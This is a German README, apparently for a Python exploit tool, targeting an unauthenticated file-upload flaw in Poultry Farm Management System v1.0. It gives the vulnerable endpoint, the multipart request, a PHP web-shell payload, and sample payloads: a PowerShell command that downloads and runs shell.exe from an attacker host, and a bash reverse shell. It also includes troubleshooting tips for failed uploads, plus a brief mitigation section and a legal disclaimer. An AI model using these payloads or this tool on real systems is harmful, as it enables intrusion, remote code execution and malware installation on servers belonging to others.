
Python-Exploit für nicht authentifizierte Remote-Code-Ausführung durch Datei-Upload im Poultry Farm Management System v1.0. Lädt PHP-Shells hoch, um beliebige Systembefehle auf anfälligen Zielen auszuführen.
Nicht authentifizierter Dateiupload mit Remote Code Execution
Das Poultry Farm Management System v1.0 enthält eine kritische Schwachstelle in der Produkt-Upload-Funktion. Die Anwendung validiert und bereinigt Datei-Uploads nicht ordnungsgemäß, sodass Angreifer als Produktbilder getarnte PHP-Dateien hochladen können. Diese hochgeladenen PHP-Dateien können ausgeführt werden, um eine Remote Code Execution zu erreichen.
POST /paultry/farm/product.php oder POST /farm/product.php
Die Schwachstelle kann wie folgt ausgenutzt werden:
requestscolorama (für farbige Ausgabe)pip install requests colorama
Oder alle Abhängigkeiten installieren:
pip install -r requirements.txt
Skript interaktiv ausführen:
python exploit.py
Das Skript fordert Sie auf:
==================================================
Interaktives Backdoor-Upload-Tool
==================================================
Ziel-IP-Adresse eingeben: 192.168.1.100
Ziel-Port eingeben (Standard: 80): 8080
Auszuführenden Befehl eingeben (Standard: powershell-payload):
Befehl: whoami
==================================================
BESTÄTIGUNG
==================================================
Ziel-URL: http://192.168.1.100:8080
Befehl: whoami
Möchten Sie fortfahren? (ja/nein): ja
✅ Interaktive Eingabe – Aufforderung nach IP, Port und benutzerdefinierten Befehlen
✅ Standardwerte – Sinnvolle Voreinstellungen für Komfort
✅ Farbcodierte Ausgabe – Leicht lesbare farbige Terminalausgabe
✅ Bestätigungsschritt – Einstellungen vor der Ausführung überprüfen
✅ Fehlerbehandlung – Verständliche Fehlermeldungen bei fehlgeschlagenen Anfragen
✅ Flexible Befehle – Unterstützung für beliebige Shell-Befehle oder PowerShell-Payloads
powershell -Command "Invoke-WebRequest http://angreifer-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"
bash -i >& /dev/tcp/angreifer-ip/4444 0>&1
whoami
id
ifconfig
hostname
pwd
/assets/img/productimages/ gespeichertsystem()-Funktion ausPOST /paultry/farm/product.php
Content-Type: multipart/form-data
category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]
<?php system('BEFEHL_HIER');?>
Der Exploit wurde getestet auf:
⚠️ RECHTLICHER HINWEIS
Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken bereitgestellt. Unautorisierter Zugriff auf Computersysteme ist illegal.
Software aktualisieren – Sicherheitspatches anwenden, falls verfügbar
Datei-Upload-Validierung
Konfiguration
<Directory /uploads>
php_flag engine off
AddType text/plain .php .phtml .php3 .php4 .php5 .phar
</Directory>
Zugriffskontrolle
Überwachung
Fehler: Verbindung abgelehnt
Lösung: Überprüfen Sie, ob die Ziel-IP und der Port korrekt sind und die Anwendung läuft
Fehler: Shell-Upload fehlgeschlagen. Statuscode: 404
Lösung: Der Endpunkt-Pfad kann abweichen. Häufige Pfade: /farm/, /paultry/farm/
Fehler: Befehlsausgabe ist leer
Lösung: Die PHP-Ausführung könnte deaktiviert sein oder die Datei wurde nicht korrekt hochgeladen
Bei Problemen, Fragen oder Verbesserungsvorschlägen wenden Sie sich bitte an das GitHub-Repository oder die Exploit-DB-Seite.
Letzte Aktualisierung: Dezember 2024
Status: Verifiziert und getestet